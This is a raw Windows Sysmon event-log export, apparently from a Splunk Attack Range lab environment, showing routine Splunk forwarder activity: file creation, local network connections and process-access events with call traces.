AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:48.529{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E36B1DC2C3623DD0F8EED036516C2828,SHA256=3824E36DC1809309CEC374B4ECD81AB9DDEAAE57C26A37AD9DC6AD1DB48D0D4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA6CFA826268E72E18AF87D73CF7E131,SHA256=206E621B0A47B46142641E6E6589C4C6FE3CB4FC3AA5DBA3098752DD9F117B2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.397{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FCFB4EE6A863D285247613302DC20B0,SHA256=DAC8FE6035D3198203FE46AC4800584753A3EC9F87750440A071DFBF953ADF71,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.478{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51292-false10.0.1.12-8000- 354300x8000000000000000215957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.338{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51291-false10.0.1.12-8089- 10341000x8000000000000000215956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1098-6216-3E04-000000003902}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1098-6216-3E04-000000003902}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.069{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1098-6216-3E04-000000003902}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:48.070{4F8D34B0-1098-6216-3E04-000000003902}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:49.592{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D93A8641402A701F930B05B87EC268,SHA256=E4B266B2770CA598A9EBF5F860A3568593E66B1071AF6D73278FFB750F1659A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1099-6216-4004-000000003902}2964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 